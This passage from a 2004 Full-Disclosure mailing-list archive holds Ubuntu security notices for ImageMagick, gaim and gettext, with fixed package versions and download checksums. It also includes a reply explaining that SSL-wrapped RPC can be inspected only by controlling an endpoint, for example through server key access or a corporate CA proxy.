http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6_6.0.2.5-1ubuntu1.1_i386.deb Size/MD5: 162540 eb64e055ba51901960dde16af468bbdc http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.0.2.5-1ubuntu1.1_i386.deb Size/MD5: 1425038 e50228507fdfbefcd6176b756040bca4 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.0.2.5-1ubuntu1.1_i386.deb Size/MD5: 1115170 8af906dc32e2dee6a5c171dc0444557f http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.0.2.5-1ubuntu1.1_i386.deb Size/MD5: 136900 41773f2582175646942845dc28c44011 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.0.2.5-1ubuntu1.1_powerpc.deb Size/MD5: 1371144 f0d39986f275d1119268da7affcc34e3 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6-dev_6.0.2.5-1ubuntu1.1_powerpc.deb Size/MD5: 224970 15be8f07f8a697d6665f27d504dba9f1 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++6_6.0.2.5-1ubuntu1.1_powerpc.deb Size/MD5: 154292 386fca02c1a14d5e5376c1dde3b3cdbb http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6-dev_6.0.2.5-1ubuntu1.1_powerpc.deb Size/MD5: 1659816 15078f23f6626d1ccb01ad6d2f6f58d6 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick6_6.0.2.5-1ubuntu1.1_powerpc.deb Size/MD5: 1151174 0d4aa571620cf6c27f6b5deaf392887c http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.0.2.5-1ubuntu1.1_powerpc.deb Size/MD5: 135840 4b5d9556339726e1cb277abd0c2692f6 signature.asc Description: Digital signature
Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP
On Tue, 26 Oct 2004 16:47:21 +0100, Airey, John [EMAIL PROTECTED] wrote: Therefore my point still stands that if someone does possess a mathematical solution to the above, then all bets are off. (Whoever it was who disagreed about my statements on encryption, please remember the context of the thread is about SSL security, not one-time keys). Agreed. Current SSL standards rely on public key encryption methods which obtain their strength from the difficulty of the factoring problem. Getting back to the original question, you can't discover if someone is sending RPC over https unless you have a solution to the RSA hard problem above. Nor is it a major security issue if someone is using RPC over https either, unless there are flaws in the implementation of SSL or RPC that could be exploited by someone else. Yes -- however, there are workarounds. If you control one end point or the other, then you can take steps to permit examination of the contents of SSL sessions. Server: If you control the server, you can of course load the keys into the sniffer (risky, but not unheard of, see http://www.radware.com/content/products/ct100/default.asp)) or terminate the SSL session on a device under your control. (For an RPC-over-HTTP example, see this document: http://www.msexchange.org/pages/article_p.asp?id=613) Client: If you control the client (say a corporate desktop PC), you have another option -- you can modify the clients list of trusted CAs, and force the client to establish the SSL session to your proxy server. This gives the proxy an opportunity to inspect/log/modify the cleartext contents of the session. The proxy establishes it's own SSL session to the remote server normally neither the client or server would be aware of the MITM. A freeware implementation of this MITM approach was Achilles, I have also seen at least one commercial product offering this functionality to permit content-scanning of outbound HTTPS browser traffic. Kevin Kadow ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [USN-8-1] gaim vulnerabilities
=== Ubuntu Security Notice USN-8-1 October 27, 2004 gaim vulnerabilities CAN-2004-0891 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) The following packages are affected: gaim The problem can be corrected by upgrading the affected package to version 1:1.0.0-1ubuntu1.1. In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: A buffer overflow and two remote crashes were recently discovered in gaim's MSN protocol handler. An attacker could potentially execute arbitrary code with the user's privileges by crafting and sending a particular MSN message. Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1.diff.gz Size/MD5:40716 a1cd244a1d9197c9a4855706f857ede2 http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1.dsc Size/MD5: 853 dbd5a82e0fa2c33df8fc26d636a2f9f1 http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0.orig.tar.gz Size/MD5: 6985979 7dde686aace751a49dce734fd0cb7ace amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_amd64.deb Size/MD5: 3443672 0a2a22b071c0256a2d68d20b474fdddc i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_i386.deb Size/MD5: 3353616 1b825ce8a2cbba5fa2171fa089f71112 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.0.0-1ubuntu1.1_powerpc.deb Size/MD5: 3417684 bae36e86bcf49722af6497d55a2de5fc signature.asc Description: Digital signature
[Full-Disclosure] [USN-5-1] gettext vulnerabilities
=== Ubuntu Security Notice USN-5-1 October 27, 2004 gettext vulnerabilities CAN-2004-0966 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) The following packages are affected: gettext The problem can be corrected by upgrading the affected package to version 0.14.1-2ubuntu0.1. In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Recently, Trustix Secure Linux discovered some vulnerabilities in the gettext package. The programs autopoint and gettextize created temporary files in an insecure way, which allowed a symlink attack to create or overwrite arbitrary files with the privileges of the user invoking the program. Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1.diff.gz Size/MD5:82347 e172d137c397dc88ca545acebd40b423 http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1.dsc Size/MD5: 789 d273a3e94446d89f603d16ed9587d00b http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1.orig.tar.gz Size/MD5: 6550874 78f4b862510beb2e5d43223dd610e77d Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-doc_0.14.1-2ubuntu0.1_all.deb Size/MD5: 638924 610bd9c00f7971f9d359f7a3902db2e4 http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-el_0.14.1-2ubuntu0.1_all.deb Size/MD5:45340 cf1fc64a65b38622fdbd29e63b538b69 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-base_0.14.1-2ubuntu0.1_amd64.deb Size/MD5:92890 581e614d3c390a0b0c4b52752e03cf75 http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1_amd64.deb Size/MD5: 1576278 a3240029c897fcfac68be7eda1f638bb i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-base_0.14.1-2ubuntu0.1_i386.deb Size/MD5:91066 df2857a4dd7be300743c4e8ec7990997 http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1_i386.deb Size/MD5: 1549186 d16f720d7ef6e031afab70263394c70a powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext-base_0.14.1-2ubuntu0.1_powerpc.deb Size/MD5:94174 9f849ed93f64d80fe669603b581b9df3 http://security.ubuntu.com/ubuntu/pool/main/g/gettext/gettext_0.14.1-2ubuntu0.1_powerpc.deb Size/MD5: 1590102 cba3d457ded8697c018b3e3ac6853f94 signature.asc Description: Digital signature
